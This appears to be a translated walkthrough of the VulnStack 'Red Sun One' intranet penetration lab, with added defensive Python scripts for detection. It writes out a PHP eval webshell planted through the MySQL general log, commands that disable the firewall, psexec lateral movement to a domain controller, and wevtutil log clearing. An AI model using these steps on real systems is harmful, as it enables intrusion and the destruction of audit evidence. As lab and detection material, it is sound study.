preamble
VulnStack, a knowledge platform built by the Red Sun security team, has the unique advantage of comprehensively simulating the real business environments of domestic enterprises, covering core elements such as CMS, vulnerability management and domain management. This design comes from the Red Sun team's deep understanding and skilled application of the ATT&CK red-team assessment design pattern. The range environment and its challenges are built around environment setup, vulnerability exploitation, intranet information collection, lateral movement, penetration channel construction, persistence control and trace cleaning, aiming to give security researchers a realistic and comprehensive intranet penetration learning environment. If anything is wrong, masters, please point it out; the content is for reference only, please don't flame, thank you.
Environment preparation
Download link: /vuln/detail/2/
There are three machines in Red Sun One's target machine.
network topology
First, in the virtual network editor, set the host-only adapter to the 52 segment.
Add a second network card to the Win7 extranet host to emulate a public-facing server.
After booting, set the Local Area Connection to obtain an IP address automatically; it defaults to a static address that does not match our host-only network mode, so otherwise it cannot reach the Internet or even the host.
Win2008 is the domain controller; configure it as follows and change its network mode to host-only.
Win2003 is a domain member.
Boot the environment
Login password: hongrisec@2019; all three machines share it. If you are prompted to change the password after logging in, all three machines then use the new password. The account name is Administrator.
Start the web service on Win7 and begin the penetration test.
Information collection
Host 129 is discovered.
Then run an nmap port scan against it; ports 80 and 3306 (MySQL) are open.
Visiting the target's address shows a probe page containing the absolute path of the phpStudy site and the administrator's e-mail address, and it reports that remote file inclusion is enabled.
Scrolling down also reveals a MySQL connection check.
Default weak password root/root; the test login succeeds.
We use dirb, the directory scanner bundled with Kali, and scan as follows
dirb http://192.168.209.129/
Visiting one of the results gives useful information: PHP version 5.4.45
There is also a phpMyAdmin; log in with the weak password just found.
web penetration
Entering the backend, we find that MySQL does not allow writing files out (secure_file_priv); without system privileges we cannot change that path to write files.
show variables like "secure%";
So use the second method: writing through the log.
show variables like "%general%";
The root account we use has DBA privileges, so we can change the log path directly to the site root, create a file there, and write a one-line webshell. Note that this writes to the log file rather than writing a file out, so secure_file_priv does not need to be "".
set global general_log="on";
set global general_log_file="C:/phpStudy/WWW/";
Write a one-line webshell into the log, and it can be reached through the web server.
select "<?php @eval($_POST[10]); ?>";
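From the defender's side, the interesting point in the steps above is that secure_file_priv only governs INTO OUTFILE/LOAD DATA; the general log is a separate write path, so the check has to cover both the server variables and the web root. The script below is an added example for this write-up (not VulnStack's or the original author's code): it audits a SHOW VARIABLES snapshot for the general_log/general_log_file/secure_file_priv combination, and scans a web root for files that carry the MySQL general-log banner or query text with an executable PHP tag. The log contents, the file name log.php and the variable values are constructed.

```python
"""Added example for this write-up (not VulnStack's or the original author's
code): detect a MySQL general log that has been redirected into the web root
and seeded with PHP, and audit the server variables that make that possible.
All file contents, paths and variable values below are constructed."""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Banner MySQL writes at the top of every general log file.
LOG_HEADER = re.compile(r"mysqld(\.exe)?, Version: .*started with:", re.I)
PHP_OPEN = re.compile(r"<\?php", re.I)
# Execution primitives typically used in a log-planted one-liner.
EXEC_CALL = re.compile(r"\b(eval|assert|system|passthru|shell_exec)\s*\(", re.I)

# Constructed general-log contents as they would look after the SELECT on this page.
SAMPLE_LOG = (
    "C:\\phpStudy\\MySQL\\bin\\mysqld.exe, Version: 5.x (constructed). started with:\n"
    "TCP Port: 3306, Named Pipe: MySQL\n"
    "Time                 Id Command    Argument\n"
    "191001 12:00:00      5 Query      select \"<?php @eval($_POST[10]); ?>\"\n"
)


def classify_file(path: Path) -> Optional[str]:
    """Return a finding label for one file, or None if nothing suspicious."""
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return None
    is_php = path.suffix.lower() in {".php", ".phtml"}
    if is_php and LOG_HEADER.search(text):
        # A MySQL log banner inside a .php file: the log was pointed at the web root.
        return "mysql-log-served-as-php"
    if PHP_OPEN.search(text) and EXEC_CALL.search(text) and "Query" in text:
        # Query text echoed together with an executable PHP tag, whatever the extension.
        return "php-exec-in-query-text"
    return None


def scan_webroot(root: Path) -> Dict[str, str]:
    """Map relative file paths under *root* to finding labels."""
    return {
        str(p.relative_to(root)): label
        for p in sorted(root.rglob("*"))
        if p.is_file() and (label := classify_file(p))
    }


def audit_mysql_variables(variables: Dict[str, str], webroot: str) -> List[str]:
    """Flag the variable combination that turns the general log into a file-write
    primitive. *variables* is SHOW VARIABLES output as a dict (constructed here)."""
    issues = []
    if variables.get("general_log", "OFF").upper() == "ON":
        issues.append("general_log is ON: every statement is written to disk")
    log_file = variables.get("general_log_file", "").replace("\\", "/").lower()
    if log_file.startswith(webroot.replace("\\", "/").lower().rstrip("/") + "/"):
        issues.append(f"general_log_file {log_file!r} is inside the web root")
    if variables.get("secure_file_priv", "NULL") == "":
        issues.append("secure_file_priv is empty: INTO OUTFILE may write anywhere")
    return issues


def demo() -> Dict[str, str]:
    """Build a throwaway web root with the constructed log and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / "log.php").write_text(SAMPLE_LOG)  # file name is an assumption
        return scan_webroot(root)


if __name__ == "__main__":
    print(demo())
    print(audit_mysql_variables(
        {"general_log": "ON", "general_log_file": "C:/phpStudy/WWW/log.php",
         "secure_file_priv": "NULL"}, "C:/phpStudy/WWW"))
```

The variable audit deliberately treats a NULL secure_file_priv as the safe value (file import/export disabled) and only the empty string as a finding, matching MySQL's semantics; the general_log check is independent of it, which is exactly why the variable alone gives a false sense of safety.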
Access the log file through the web server
Connect with AntSword
Generate a payload with Cobalt Strike
Upload the payload
Execute the payload and the host comes online.
Turn off the firewall. It does not matter whether it is already off here.
shell netsh advfirewall set allprofiles state off
Elevation of Privileges
Check the current privileges: the account is a local administrator
getuid
Elevate privileges
Select the listener that points at your Kali host's address
Try the options one by one; svc-exe elevates successfully
Elevation to SYSTEM privileges succeeds
Intranet information collection
View ip address
shell ipconfig
Show all system users
shell net user
Enumerate computer names
shell net view
Determine if a domain exists
shell net config Workstation
List the domains; there is one, GOD
shell net view /domain
Next, perform a port scan
Specify this host's other NIC (the intranet segment) and use either an ARP scan or an ICMP scan.
Two hosts are found
Both have port 445 open
Capture the cleartext password
intranet horizontal
The port scan showed port 445 open, so we can create an SMB listener (SMB, Server Message Block, is the Windows network file-sharing protocol that lets computers on a network access each other's files and printers).
Create a new listener
Show the targets in list view
Locate the domain controller found by the scan, choose lateral movement, and select the psexec option.
Configure it as follows
With that we have the domain controller
The same works for the other intranet host, since both are in the same domain
Clear the logs. Be careful: run the commands more than once, since a single run sometimes does not clear everything.
shell wevtutil cl security //clear the Security log
shell wevtutil cl system //clear the System log
shell wevtutil cl application //clear the Application log
shell wevtutil cl "windows powershell" //clear the Windows PowerShell log
shell wevtutil cl Setup //clear the Setup log
Or simply use a plugin
The network topology map shows all hosts online
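Each step of the chain above leaves a host-side record that survives the wevtutil cleanup longer than the attacker would like: the netsh command appears as a process-creation event, the psexec-style pivot installs a service whose binary is served from an admin share (Service Control Manager event 7045 in the System log), clearing the Security log writes event 1102 into the Security log itself, and clearing any other channel writes event 104 into the System log. The script below is an added example for this write-up (not from the original post or any tool it uses): it classifies constructed event records in the shape of an EVTX-to-JSON export and flags hosts where a remote service install is followed by a log clear. Host names, timestamps, the service name f3a1c9b and the image path are constructed.

```python
"""Added example for this write-up (not from the original post): hunt the
host-side trail the steps above leave in Windows event logs: the firewall
disabled with netsh, a service installed from an admin share by psexec-style
lateral movement, and event logs cleared with wevtutil. The records are
constructed in the shape of an EVTX-to-JSON export; they are not real logs."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Event:
    time: str          # ISO-8601, constructed
    host: str
    channel: str       # "Security" or "System"
    event_id: int
    fields: Dict[str, str] = field(default_factory=dict)


# Constructed sample records; host names, service name and paths are assumptions.
SAMPLE_EVENTS = [
    Event("2019-10-01T09:00:00", "WIN7", "System", 7045,
          {"ServiceName": "MySQL", "ImagePath": "C:\\phpStudy\\MySQL\\bin\\mysqld.exe"}),
    Event("2019-10-01T10:00:01", "WIN7", "Security", 4688,
          {"SubjectUserName": "Administrator",
           "CommandLine": "netsh advfirewall set allprofiles state off"}),
    Event("2019-10-01T10:00:30", "OWA", "System", 7045,
          {"ServiceName": "f3a1c9b", "ImagePath": "\\\\127.0.0.1\\ADMIN$\\f3a1c9b.exe"}),
    Event("2019-10-01T10:05:00", "OWA", "Security", 1102,
          {"SubjectUserName": "Administrator"}),
    Event("2019-10-01T10:05:01", "OWA", "System", 104,
          {"Channel": "Application", "SubjectUserName": "Administrator"}),
]

FIREWALL_OFF = re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)
# A service binary served from an admin share is the classic psexec pattern.
ADMIN_SHARE = re.compile(r"^\\\\[^\\]+\\ADMIN\$\\", re.I)


def classify(ev: Event) -> Optional[str]:
    """Label one event if it matches a step of the attack chain, else None."""
    if ev.channel == "Security" and ev.event_id == 4688 \
            and FIREWALL_OFF.search(ev.fields.get("CommandLine", "")):
        return "firewall-disabled"
    if ev.channel == "System" and ev.event_id == 7045 \
            and ADMIN_SHARE.search(ev.fields.get("ImagePath", "")):
        return "service-installed-from-admin-share"
    if ev.channel == "Security" and ev.event_id == 1102:
        return "security-log-cleared"            # "The audit log was cleared"
    if ev.channel == "System" and ev.event_id == 104:
        return "log-cleared:" + ev.fields.get("Channel", "?")  # any other channel
    return None


def hunt(events: List[Event]) -> List[Tuple[str, str, str]]:
    """Return (time, host, label) for every matching event, in time order."""
    hits = []
    for ev in sorted(events, key=lambda e: e.time):
        label = classify(ev)
        if label:
            hits.append((ev.time, ev.host, label))
    return hits


def hosts_cleared_after_lateral_movement(events: List[Event]) -> List[str]:
    """Hosts where a remote service install is later followed by a log clear:
    the strongest signal on this page, since it pairs the pivot with the cleanup."""
    by_host: Dict[str, List[str]] = {}
    for _, host, label in hunt(events):
        by_host.setdefault(host, []).append(label)
    flagged = []
    for host, labels in by_host.items():
        if "service-installed-from-admin-share" in labels:
            start = labels.index("service-installed-from-admin-share")
            if any(l.endswith("cleared") or l.startswith("log-cleared")
                   for l in labels[start:]):
                flagged.append(host)
    return sorted(flagged)


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(*hit)
    print("cleared after pivot:", hosts_cleared_after_lateral_movement(SAMPLE_EVENTS))
```

The 4688 match only works when process-creation auditing with command-line logging is enabled, which is not the default; the 7045, 1102 and 104 records are written regardless, and forwarding them off the host before the wevtutil step runs is what makes the cleanup in this write-up visible rather than effective.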
Summary
I managed to get all 3 target machines online, hhhhhhh, masters please point out my mistakes, thanks